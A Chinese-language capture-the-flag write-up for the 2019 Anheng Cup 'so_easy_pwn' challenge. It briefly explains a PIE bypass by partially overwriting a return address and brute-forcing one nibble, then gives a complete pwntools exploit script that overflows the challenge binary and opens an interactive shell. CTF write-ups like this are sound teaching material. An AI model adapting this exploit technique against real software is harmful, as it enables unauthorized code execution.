安恒杯2019-so_easy_pwn

发表于 | 分类于 |

通过修改栈上内容来影响下个函数栈上的状态,以此来劫持函数地址

0x01 PIE绕过

PIE开启最后三位也是不变的,一般我们会修改它的后四位地址,然后爆破那一位达到函数调用的效果。

通过recv(timeout = 1)可以触发exccept

0x02 EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from pwn import *
context.log_level = 'debug'
i = 0
shell = 'a9cd'
while True:
    i += 1
    print i 
    sh = process('./pwn')
    #sh = remote('101.71.29.5',10000)
    sh.recvuntil("Welcome our the ")
    PIE_addr =hex(int(sh.recv(5)))
    payload = 'a'*12 +p32(int(PIE_addr + shell,16))
    sh.recvuntil("So, Can you tell me your name?")
    sh.send(payload)
    sh.recvuntil("Please input your choice:(1.hello|2.byebye):")
    sleep(0.1)
    sh.sendline('\x00')
    try:
        sh.recv(timeout = 1)
        sh.recv(timeout = 1)
    except Exception as e:
	print 'exception %s' % e
	sh.close()
        continue
    else:
        sleep(0.1)
        sh.interactive()
-------------本文结束感谢您的阅读-------------
+ +